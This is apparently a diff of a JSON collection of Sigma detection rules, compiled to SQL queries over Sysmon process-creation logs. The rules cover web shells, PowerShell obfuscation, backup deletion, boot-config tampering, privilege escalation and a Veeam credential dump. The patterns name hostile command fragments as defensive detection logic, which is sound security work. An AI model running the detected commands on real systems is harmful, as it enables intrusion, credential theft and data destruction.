This is often used after a privilege escalation attempt.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%-noni -ep bypass $%' ESCAPE '\\' OR (CommandLine LIKE '%cyzfc.dat,%' ESCAPE '\\' AND CommandLine LIKE '%PointFunctionCall%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt29_phishing_campaign_indicators.yml" + "filename": "proc_creation_win_whoami_priv_discovery.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation", - "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", - "status": "test", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Download Arbitrary Files Via PresentationHost.exe", + "id": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "status": "experimental", + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" + "filename": "proc_creation_win_lolbin_presentationhost_download.yml" }, { - "title": "Renamed AutoHotkey.EXE Execution", - "id": "0f16d9cf-0616-45c8-8fad-becc11b5a41c", + "title": "Shells Spawned by Web Servers", + "id": "8202070f-edeb-4d31-a010-a26c72ac5600", "status": "test", - "description": "Detects execution of a renamed autohotkey.exe binary based on PE metadata fields", - "author": "Nasreddine Bencherchali", + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1505.003", + "attack.t1190" ], "falsepositives": [ - "Unknown" + "Particular web applications may spawn a shell process legitimately" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%AutoHotkey%' ESCAPE '\\' OR Description LIKE '%AutoHotkey%' ESCAPE '\\' OR OriginalFileName IN ('AutoHotkey.exe', 'AutoHotkey.rc')) AND NOT ((Image LIKE '%\\\\AutoHotkey.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey64\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyA32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyA32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU64\\_UIA.exe' ESCAPE '\\') OR Image LIKE '%\\\\AutoHotkey%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\at.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsget.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR Image LIKE '%\\\\find.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\hostname.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netdom.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\' OR Image LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\ver.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager 
\"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_autohotkey.yml" + "filename": "proc_creation_win_webshell_spawn.yml" }, { - "title": "Suspicious PowerShell Invocation From Script Engines", - "id": "95eadcb2-92e4-4ed1-9031-92547773a6db", - "status": "test", - "description": "Detects suspicious powershell invocations from interpreters or unusual programs", - "author": "Florian Roth (Nextron Systems)", + "title": "Process Creation Using Sysnative Folder", + "id": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", + "status": "experimental", + "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.t1055" ], "falsepositives": [ - "Microsoft Operations Manager (MOM)", - "Other scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\Health Service State\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE 'C:\\\\Windows\\\\Sysnative\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_script_engine_parent.yml" + "filename": "proc_creation_win_susp_sysnative.yml" }, { - "title": "PDQ Deploy Remote Adminstartion Tool Execution", - "id": "d679950c-abb7-43a6-80fb-2a480c4fc450", + "title": "Import LDAP Data Interchange Format File Via Ldifde.EXE", + "id": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", "status": 
"experimental", - "description": "Detect use of PDQ Deploy remote admin tool", - "author": "frack113", + "description": "Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.\n", + "author": "@gott_cyber", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" + "attack.command_and_control", + "attack.defense_evasion", + "attack.t1218", + "attack.t1105" ], "falsepositives": [ - "Legitimate use" + "Since the content of the files are unknown, false positives are expected" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PDQ Deploy Console' OR Product = 'PDQ Deploy' OR Company = 'PDQ.com' OR OriginalFileName = 'PDQDeployConsole.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND (CommandLine LIKE '%-i%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pdqdeploy_execution.yml" + "filename": "proc_creation_win_ldifde_file_load.yml" }, { - "title": "Boot Configuration Tampering Via Bcdedit.EXE", - "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", - "status": "stable", - "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Suspicious Parent Double Extension File Execution", + "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", + "status": "experimental", + "description": "Detect execution of suspicious double extension files in ParentCommandLine", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%.doc.lnk' ESCAPE '\\' OR ParentImage LIKE '%.docx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xls.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.txt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.doc.js' ESCAPE '\\' OR ParentImage LIKE '%.docx.js' ESCAPE '\\' OR ParentImage LIKE '%.xls.js' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.js' ESCAPE '\\' OR ParentImage LIKE '%.ppt.js' ESCAPE '\\' OR ParentImage LIKE '%.pptx.js' ESCAPE '\\' OR ParentImage LIKE '%.rtf.js' ESCAPE '\\' OR ParentImage LIKE '%.pdf.js' ESCAPE '\\' OR ParentImage LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine 
LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" + "filename": "proc_creation_win_susp_double_extension_parent.yml" }, { - "title": "Suspicious Execution of Shutdown to Log Out", - "id": "ec290c06-9b6b-4338-8b6b-095c0f284f10", + "title": "Potential Privilege Escalation To LOCAL SYSTEM", + "id": "207b0396-3689-42d9-8399-4222658efc99", "status": "experimental", - "description": "Detects the rare use of the command line tool shutdown to logoff a user", - "author": "frack113", + "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1529" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 
'%\\\\shutdown.exe' ESCAPE '\\' AND CommandLine LIKE '%/l%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_shutdown_logoff.yml" + "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" }, { - "title": "Droppers Exploiting CVE-2017-11882", - "id": 
"678eb5f4-8597-4be6-8be7-905e4234b53a", - "status": "stable", - "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", - "author": "Florian Roth (Nextron Systems)", + "title": "Renamed Jusched.EXE Execution", + "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", + "status": "test", + "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", + "author": "Markus Neis, Swisscom", "tags": [ "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (Image LIKE '%\\\\jusched.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2017_11882.yml" + "filename": "proc_creation_win_renamed_jusched.yml" }, { - "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", - "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", + "title": "SystemStateBackup Deleted Using Wbadmin.EXE", + "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", "status": "test", - "description": "Detects dump of credentials in VeeamBackup dbo", + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1005" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" + "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" }, { - "title": "Node Process Executions", - "id": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", + "title": "HackTool - Stracciatella Execution", + "id": "7a4d9232-92fc-404d-8ce1-4c92e7caf539", "status": "experimental", - "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1127", - "attack.t1059.007" + "attack.t1059", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\Adobe Creative Cloud Experience\\\\libs\\\\node.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%Adobe Creative Cloud Experience\\\\js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Stracciatella.exe' ESCAPE '\\' OR 
OriginalFileName = 'Stracciatella.exe' OR Description = 'Stracciatella' OR (Hashes LIKE '%SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a%' ESCAPE '\\') OR sha256 IN ('9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956', 'fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a')))" ], - "filename": "proc_creation_win_node_adobe_creative_cloud_abuse.yml" + "filename": "proc_creation_win_hktl_stracciatella_execution.yml" }, { - "title": "Use of Remote.exe", - "id": "4eddc365-79b4-43ff-a9d7-99422dc34b93", + "title": "Potentially Over Permissive Permissions Granted Using Dsacls.EXE", + "id": "01c42d3c-242d-4655-85b2-34f1739632f7", "status": "experimental", - "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects usage of Dsacls to grant over permissive permissions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." 
+ "Legitimate administrators granting over permissive permissions to users" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\remote.exe' ESCAPE '\\' OR OriginalFileName = 'remote.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND CommandLine LIKE '% /G %' ESCAPE '\\' AND (CommandLine LIKE '%GR%' ESCAPE '\\' OR CommandLine LIKE '%GE%' ESCAPE '\\' OR CommandLine LIKE '%GW%' ESCAPE '\\' OR CommandLine LIKE '%GA%' ESCAPE '\\' OR CommandLine LIKE '%WP%' ESCAPE '\\' OR CommandLine LIKE '%WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_remote.yml" + "filename": "proc_creation_win_dsacls_abuse_permissions.yml" }, { - "title": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE", - "id": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", + "title": "PUA - Wsudo Suspicious Execution", + "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "status": "experimental", - "description": "Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts", + "description": "Detects usage of wsudo (Windows Sudo Utility). 
Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047" + "attack.privilege_escalation", + "attack.t1059" ], "falsepositives": [ "Unknown" ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentImage LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" + }, + { + "title": "WinDbg/CDB LOLBIN Usage", + "id": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", + "status": "test", + "description": "Detects usage of \"cdb.exe\" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file", + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", + "tags": [ + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1218", + "attack.t1127" + ], + "falsepositives": [ + "Legitimate use of debugging tools" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '% qfe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cdb.exe' ESCAPE '\\' OR OriginalFileName = 'CDB.Exe') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -cf %' ESCAPE '\\'))" ], - "filename": 
